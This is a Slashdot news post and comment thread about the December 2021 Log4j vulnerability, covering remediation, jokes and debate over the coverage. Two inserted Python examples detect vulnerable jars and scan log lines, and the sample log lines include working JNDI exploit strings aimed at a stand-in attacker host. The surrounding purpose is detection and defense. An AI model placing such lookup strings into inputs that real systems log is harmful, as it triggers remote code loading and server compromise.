Software Flaw Sparks Global Race To Patch Bug (wsj.com)

Companies and governments around the world rushed over the weekend to fend off cyberattacks looking to exploit a serious flaw in a widely used piece of Internet software that security experts warn could give hackers sweeping access to networks. From a report: Cybersecurity researchers said the bug, hidden in an obscure piece of server software called Log4j, represents one of the biggest risks seen in recent years because the code is so widely used on corporate networks. The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency issued an urgent alert about the vulnerability and urged companies to take action. CISA Director Jen Easterly said on Saturday, "To be clear, this vulnerability poses a severe risk. We will only minimize potential impacts through collaborative efforts between government and the private sector." Germany's cybersecurity organization over the weekend issued a "red alert" about the bug. Australia called the issue "critical."

Security experts warned that it could take weeks or more to assess the extent of the damage and that hackers exploiting the vulnerability could access sensitive data on networks and install back doors they could use to maintain access to servers even after the flawed software has been patched. "It is one of the most significant vulnerabilities that I've seen in a long time," said Aaron Portnoy, principal scientist with the security firm Randori. Security experts noted that many companies have other processes in place that would prevent a malicious hacker from running software and breaking into these companies, potentially limiting the fallout from the bug. Microsoft, in an alert to customers, said "attackers are probing all endpoints for vulnerability." Amazon.com, Twitter and Cisco were among the companies that have said they were carrying out investigations into the depth of the problem. Amazon, the world's biggest cloud computing company, said in a security alert, "We are actively monitoring this issue, and are working on addressing it."

  • by fahrbot-bot ( 874524 ) on Monday December 13, 2021 @02:33PM (#62076489)

    Just upgrade from Log4j to Log4k -- the version number is base 36, right?

    • by VaccinesCauseAdults ( 7114361 ) on Monday December 13, 2021 @02:43PM (#62076529)
      No, Log4j() calculates the logarithm to base 4j, that is four times the unit imaginary number (engineering notation).

      For a complex input z, Log4j(z) returns the complex number w such that (4j)^w = z.

      It is a rare but important function alongside the more common ones: Log2(), LogE() and Log10().

    • Re: (Score:3, Informative)

      by Tablizer ( 95088 )

      Or Log4j++ blockchain microservice edge cloud web-assembly. If you are going to be hacked, get hacked by the "in" crowd to be cool.

      • Or Log4j++ blockchain microservice edge cloud web-assembly. If you are going to be hacked, get hacked by the "in" crowd to be cool.

        I'll be even cooler once I buy the NFT of the buggy library.

  • Love the title (Score:5, Insightful)

    by saloomy ( 2817221 ) on Monday December 13, 2021 @02:33PM (#62076493)
    It is not like the name of the package, versions, or prevalence is important. Just that there is a bug. Nothing else is important information.
    • hidden in an obscure piece of server software called Log4j, represents one of the biggest risks seen in recent years because the code is so widely used on corporate networks.

      Sounds a little rushed to press -- "obscure" and "widely used" doesn't really jibe [merriam-webster.com].

      • Re: Love the title (Score:5, Insightful)

        by NagrothAgain ( 4130865 ) on Monday December 13, 2021 @03:01PM (#62076639)
        If by "rushed to press" you meant "lazily posted 4 days after the rest of the tech world started widely discussing and panicking over it" then yes, that would be accurate.
      • Re:Love the title (Score:4, Insightful)

        by Anonymous Coward on Monday December 13, 2021 @03:39PM (#62076801)

        "obscure" and "widely used" doesn't really jibe

        Most know about "TCP ports", despite the fact that there are TWO ports in a TCP header, the "destination port" being the one most know about.

        The "source port" is practically unknown to anyone with extensive networking experience/knowledge, making it "obscure".
        Yet it is used within every TCP packet ever generated, making it also "widely used".

        On topic, until last Friday, I had no idea Java didn't include a logging function of its own and to get even the most basic text file debugging requires an external library to do it.
        I'd dare say nearly all non-java programmers were likely just as unaware.

        Even having installed a couple of Java based programs in my time, the realization that not just the program, but its dependencies, those dependencies' dependencies, and so on, have independently opted to use the same non-1st-party logging library, is mind boggling.

        It's very fair to say this library is obscure.
        That it keeps popping up in so many different programs also makes it widely used, even if entirely unbeknownst to those using the program.

      • Re:Love the title (Score:4, Insightful)

        by Pascoea ( 968200 ) on Monday December 13, 2021 @04:17PM (#62076947)

        "obscure" and "widely used" doesn't really jibe

        Not many people can tell you what palladium is, but anyone that has driven a car has used it. Obscure: not discovered or known about; uncertain. That could apply to thousands of things that are used every day that contain things most people don't know about.

        • by bn-7bc ( 909819 )
          Hmm, I can't say I know a lot about palladium other than it being a metal (I think) and being found somewhere in the right half of the periodic table, but then again I'm no chemist.
      • Re:Love the title (Score:4, Insightful)

        by nagora ( 177841 ) on Monday December 13, 2021 @04:56PM (#62077077)

        hidden in an obscure piece of server software called Log4j, represents one of the biggest risks seen in recent years because the code is so widely used on corporate networks.

        Sounds a little rushed to press -- "obscure" and "widely used" doesn't really jibe [merriam-webster.com].

        This is the curse of giant dependency trees - things can be used for years without most people knowing they're there. Then one day the boat sinks because there's a hole in it.

    • Re:Love the title (Score:5, Informative)

      by EvilSS ( 557649 ) on Monday December 13, 2021 @03:34PM (#62076777)
      Here is the CVE for it (which should be mandatory for /. summaries of bugs but hey, let's link to the pay-walled WSJ instead!): https://cve.mitre.org/cgi-bin/... [mitre.org]

      Affected versions 2.14.1 and below.
      • Supposedly it was introduced in one of the 2.0 betas.
        • Supposedly it was introduced in one of the 2.0 betas.

          It's a bit deeper than that (since the exploit depends on JNDI lookups being turned on in Log4J).

          There's no known exploit risks with versions 1.x, but the possibility remains. SLF4J suggests a physical remediation (by removing the JMSAppender class from the log4j jar artifacts.) See link below for details:

          http://slf4j.org/log4shell.html [slf4j.org]

          If it were up to me and happened to control a system depending on Log4J 1.x, I would do that remediation rather than run the risk.
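The two remediation targets named in this subthread, the JNDI lookup class in Log4j 2.x and the JMSAppender class in 1.x, are both just entries inside a jar, and the earlier comments about dependency trees explain why they are hard to find: the jar is usually nested inside a WAR or fat jar that nobody wrote. The following Python scanner is an added example, not code from the page or from the Log4j or SLF4J projects. It builds a constructed sample WAR in memory, walks nested archives recursively, and reports each Log4j artifact's version (from its Maven pom.properties) and whether the risky class is still present. The class and metadata paths are the real ones; the sample archive contents are constructed.

```python
import io
import zipfile
from dataclasses import dataclass
from typing import Dict, List, Optional

# Real entry paths used by the two Log4j generations.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # log4j 2.x
JMS_APPENDER_CLASS = "org/apache/log4j/net/JMSAppender.class"                # log4j 1.x
POM_PROPS_2X = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
POM_PROPS_1X = "META-INF/maven/log4j/log4j/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass(frozen=True)
class Finding:
    path: str               # "outer.war!WEB-INF/lib/inner.jar" for nested archives
    version: Optional[str]  # from pom.properties, informational only
    has_jndi_lookup: bool   # 2.x: the class behind "${jndi:...}" lookups
    has_jms_appender: bool  # 1.x: the class SLF4J recommends removing


def parse_version(props: str) -> Optional[str]:
    """Read the 'version=' key out of a Maven pom.properties file."""
    for line in props.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(data: bytes, label: str) -> List[Finding]:
    """Recursively inspect an archive (and archives nested in it) for Log4j artifacts."""
    findings: List[Finding] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # an entry with a .jar name that is not actually a zip
    with zf:
        names = set(zf.namelist())
        version = None
        for props in (POM_PROPS_2X, POM_PROPS_1X):
            if props in names:
                version = parse_version(zf.read(props).decode("utf-8", "replace"))
        has_jndi = JNDI_LOOKUP_CLASS in names
        has_jms = JMS_APPENDER_CLASS in names
        if version or has_jndi or has_jms:
            findings.append(Finding(label, version, has_jndi, has_jms))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(scan_archive(zf.read(name), f"{label}!{name}"))
    return findings


def at_risk(findings: List[Finding]) -> List[Finding]:
    """Artifacts that still carry the class the exploit path depends on."""
    return [f for f in findings if f.has_jndi_lookup or f.has_jms_appender]


def _jar(entries: Dict[str, object]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_archive() -> bytes:
    """Constructed test data: a WAR bundling an unmodified log4j-core 2.14.1,
    a copy of the same jar with JndiLookup removed, and a log4j 1.2.17 jar."""
    fake_class = b"\xca\xfe\xba\xbe"  # class-file magic; bodies are not needed here
    vulnerable_2x = _jar({POM_PROPS_2X: "version=2.14.1\n", JNDI_LOOKUP_CLASS: fake_class})
    stripped_2x = _jar({POM_PROPS_2X: "version=2.14.1\n"})
    legacy_1x = _jar({POM_PROPS_1X: "version=1.2.17\n", JMS_APPENDER_CLASS: fake_class})
    return _jar({
        "WEB-INF/lib/log4j-core-2.14.1.jar": vulnerable_2x,
        "WEB-INF/lib/log4j-core-stripped.jar": stripped_2x,
        "WEB-INF/lib/log4j-1.2.17.jar": legacy_1x,
        "WEB-INF/classes/App.class": fake_class,
    })


if __name__ == "__main__":
    results = scan_archive(build_sample_archive(), "app.war")
    for f in results:
        flag = "AT RISK" if f in at_risk(results) else "ok"
        print(f"{flag:8} {f.path}  version={f.version}")
```

The scanner deliberately reports class presence rather than comparing version numbers: a jar that has had the class removed is the remediated state the commenters describe, whatever its version string says, and a version check alone would misreport it. Point `scan_archive` at real files by reading them as bytes.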

    • If you rely on Slashdot for timely informing of vulnerabilities you need to revise your security systems.
  • " ....hidden in an obscure piece of server software called Log4j....", right. Well, that's one way to classify it...written by someone who probably hasn't got a clue what Log4j is but with these words tries to get it on some prohibition list or something. And something of value was lost if that happens.
  • by oh_my_080980980 ( 773867 ) on Monday December 13, 2021 @02:50PM (#62076577)
    That means until the next security exploit is found...
    • Re: (Score:2, Interesting)

      by EvilSS ( 557649 )
      This isn't just the cloud. There are tons of on-prem products left vulnerable by it. And you don't need direct internet access inbound to trigger it. You just need to get something using a vulnerable version of the component to log a string you craft. For example an IDS or proxy server that uses this component to write out their logs, by feeding a crafted string back to a user requesting a website that you know an affected product will log. Other systems that need to be web facing like customer support chat
    • by flink ( 18449 )

      This is a vulnerability in a logging library. Any service you built yourself that used this library would be vulnerable, cloud or no.

  • You ask the log server to execute the code.

  • I'm no Java coder at all, and even I, I have heard of log4j.
  • by Junta ( 36770 ) on Monday December 13, 2021 @03:09PM (#62076699)

    The vulnerability was in the ability to load a Java class file over LDAP. As well as being a horrible vulnerability, the whole capability sounds like the fever dream of an 'enterprise' software architect.

    • Another idiot with vision.

    • At this point, I would recommend everyone moving away from log4j. Now that one vuln was found, over the next few months a lot of attention will be focused on it, with likely more found.

      All you need for logging is the ability to redirect stdout/stderr to wherever you want it. There's no need for a massive library, and Java has an adequate native logging solution now.

      • by udittmer ( 89588 )

        "adequate" is in the eye of the beholder. When java.util.logging came out in 2002, even the log4j version then in existence was considered superior. It still is, even though wrappers like slf4j are now in common use to handle the variety of logging mechanisms.

  • by Bookwyrm ( 3535 ) on Monday December 13, 2021 @03:29PM (#62076757)

    One aspect of this vulnerability is that the attacker does not need to have opened or connected directly to the vulnerable Java program. The Java program just has to be exposed to an exploit string from *some* source such that the program logs it with a vulnerable version of log4j. At which point the program opens its own outbound connection to the exploit server. (The port number can be specified to 80 or 443 so it looks like outbound HTTP or HTTPS traffic, so just blocking outbound connections to LDAP default ports won't save you.)

    So I have moderate expectations that there will be a burst of systems exploited at the end of the month when automated billing/accounting/auditing/etc. systems start processing this month's data for the end of month or end of year reporting. It will be something like the software which drives the business bulk mailing label printer or something -- some minor Java utility that has nothing at all to do with the network -- somewhere in the processing chain which will dutifully try to execute the exploit.

    • It seems pretty dumb to allow an enterprise system unfettered outgoing access to the internet. Put it through a proxy and only allow it to connect to domain/port that it needs to for functionality. Often that would be none.
      • You should not let traffic leave your intranet except to known hosts (personal computers of course are different). The firewall to do this is easy to set up, but for some reason a lot of people don't do it.

      • by EvilSS ( 557649 )

        Put it through a proxy and only allow it to connect to domain/port that it needs to for functionality.

        So does that proxy server keep logs? If so, what component does it use for those logs? Could it be using Log4j? Woops!

        And it doesn't even need to be internet connected at all. There are already examples of people triggering the bug in network systems by changing the name of their phones. Many enterprise wifi systems will log connection attempts, even unsuccessful ones. Someone could walk into a lobby and execute arbitrary code on a network by just having their phone try to connect to the company wifi. T
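Bookwyrm's point (the logging process itself opens the outbound connection, to whatever port the string names) and the replies about egress control (allow known destinations through a proxy rather than blocking the LDAP port) can be checked against actual log lines. The Python below is an added example, not code from the page or from any commenter: it scans constructed sample web-server log lines for Log4j lookup strings in attacker-controlled fields, extracts the destination a JNDI lookup would make the logger connect to, and compares a port-only deny rule with a host allowlist. The log lines, client addresses and "attacker.example" are placeholders; the scheme default ports are the real ones.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

# Constructed sample lines in Apache combined-log format (not from the page).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:14:33:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:14:33:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:443/a}"',
    '10.0.0.9 - - [13/Dec/2021:14:33:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:rmi://attacker.example/x}"',
    '10.0.0.12 - - [13/Dec/2021:14:34:00 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 12 "-" "curl/7.79"',
]

# Any "${...}" in untrusted input is a Log4j lookup worth flagging; the jndi form
# is the one that makes the logging process reach out to host:port.
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")
JNDI_RE = re.compile(r"^\s*jndi\s*:\s*([a-z]+)://([^/:\s]+)(?::(\d+))?", re.IGNORECASE)

# Used only when the lookup omits an explicit port.
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}


@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str             # "jndi" (outbound fetch) or "lookup" (any other ${...})
    scheme: Optional[str]
    host: Optional[str]
    port: Optional[int]


def scan_line(line_no: int, line: str) -> List[Finding]:
    """Return one Finding per lookup string found in a single log line."""
    findings: List[Finding] = []
    for m in LOOKUP_RE.finditer(line):
        j = JNDI_RE.match(m.group(1))
        if j:
            scheme = j.group(1).lower()
            port = int(j.group(3)) if j.group(3) else DEFAULT_PORTS.get(scheme)
            findings.append(Finding(line_no, "jndi", scheme, j.group(2), port))
        else:
            findings.append(Finding(line_no, "lookup", None, None, None))
    return findings


def scan(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        findings.extend(scan_line(n, line))
    return findings


def blocked_by_port_denylist(f: Finding, denied_ports=frozenset({389, 636, 1099})) -> bool:
    """Egress rule that only drops the default LDAP/RMI ports; misses a lookup aimed at 443."""
    return f.port in denied_ports


def blocked_by_host_allowlist(f: Finding, allowed_hosts: Set[str]) -> bool:
    """Egress rule that permits only known destinations, whatever the port."""
    return f.host not in allowed_hosts


if __name__ == "__main__":
    allowed = {"updates.corp.example"}  # placeholder allowlist
    for f in scan(SAMPLE_LOG_LINES):
        if f.kind == "jndi":
            print(f"line {f.line_no}: jndi -> {f.scheme}://{f.host}:{f.port} "
                  f"port-deny blocks={blocked_by_port_denylist(f)} "
                  f"host-allowlist blocks={blocked_by_host_allowlist(f, allowed)}")
        else:
            print(f"line {f.line_no}: non-jndi lookup string in request")
```

Two practical notes. The scanner must itself run somewhere that does not feed these lines into a vulnerable Log4j, which is exactly the trap EvilSS describes for proxies and IDS boxes. And the pattern match is only a first pass: the durable signal is the outbound connection from a server process that has no business making one, which a default-deny egress policy both prevents and logs.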

    • The kind of exploit you describe is often called a "reverse shell," in case you want to look up more about it.

  • All you need really is a 1 bit hole in code that gives access to the system. I mean a 1 bit hole! After that a 4GHz processor can inject anything in a split second. Bit by bit. In other news (hold my beer): Microsoft is using DNA for data storage. Let's hope the API is secure and has no bit holes. Would be nasty to have malware or ransomware in a DNA database, eh?
  • WSJ, really?! (Score:5, Informative)

    by EvilSS ( 557649 ) on Monday December 13, 2021 @03:42PM (#62076811)
    Does /. have some kind of referral deal with WSJ or something? WHY THE FUCK is something like this, with literally hundreds of articles from hundreds of sites, not to mention the CVE (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 btw), linked off to only a paywalled, non-tech site in the summary??

    Here are a few githubs tracking affected products:

    https://github.com/authomize/log4j-log4shell-affected/blob/main/affected_apps.md

    https://github.com/authomize/log4j-log4shell-affected/blob/main/affected_components.md

    https://gist.github.com/SwitHa... [github.com]

    And some news articles

    https://nakedsecurity.sophos.c... [sophos.com]

    https://www.engadget.com/log4s... [engadget.com]

    https://www.infoworld.com/arti... [infoworld.com]
    • to look for signs of exploitation.

      https://gist.github.com/Neo23x... [github.com]
    • Re:WSJ, really?! (Score:4, Insightful)

      by kbahey ( 102895 ) on Monday December 13, 2021 @05:53PM (#62077237) Homepage

      Does /. have some kind of referral deal with WSJ or something? WHY THE FUCK is something like this, with literally hundreds of articles from hundreds of sites

      I have said this before:

      There has to be such a deal ...
      Not only with WSJ, but also Bloomberg and the NY Times.
      All are behind a paywall, or require a subscription, yet, /. editors keep posting articles with links to them ...

      Newsflash: Slashdotters will not subscribe to WSJ nor Bloomberg just because /. keeps posting links to them ...

      I understand they need to make money, but not at the expense of pissing off their audience.

    • Re:WSJ, really?! (Score:4, Insightful)

      by mrthoughtful ( 466814 ) on Monday December 13, 2021 @06:17PM (#62077313) Journal
      I think it's more likely to be even simpler than that: it's more likely that the person who submits the article works for said paper. The number of articles that refer to pisspoor blogs is unreal - and often the news is available from a zillion better places. Try it out for yourself: create a silly blog, take any half-interesting press release from EurekAlert (especially Space or Maths or IT or AI or Nanotech or engineering) - write a stupid blog entry about it and then submit to slashdot. 9 of 10 editors will give a cursory glance at your blog - consider it newsworthy - and post
  • "A zero-day vulnerability .. was found .. on November 24, 2021 .. The feature .. had been removed .. on December 6, 2021" ref [wikipedia.org]
    • by pjt33 ( 739471 )

      That's quite fast, compared to some...

      My boss forwarded an e-mail from the supplier of some middleware we use. In essence, they say "We're not vulnerable to this because the bug was introduced in version 2.0-beta9 and we use an earlier version". 2.0-beta9 came out more than 8 years ago [apache.org].

  • "We will only minimize potential impacts through collaborative efforts between government and the private sector."

    Right, because all the companies that have been scrambling and remediating this ASAFP needed the government (pick one, any one) to help out?

  • by thsths ( 31372 ) on Tuesday December 14, 2021 @03:55AM (#62078349)

    I thought it works as documented. Now the documented default behaviour may be very risky from a security perspective, so it may be a bad idea, but it is not a bug.
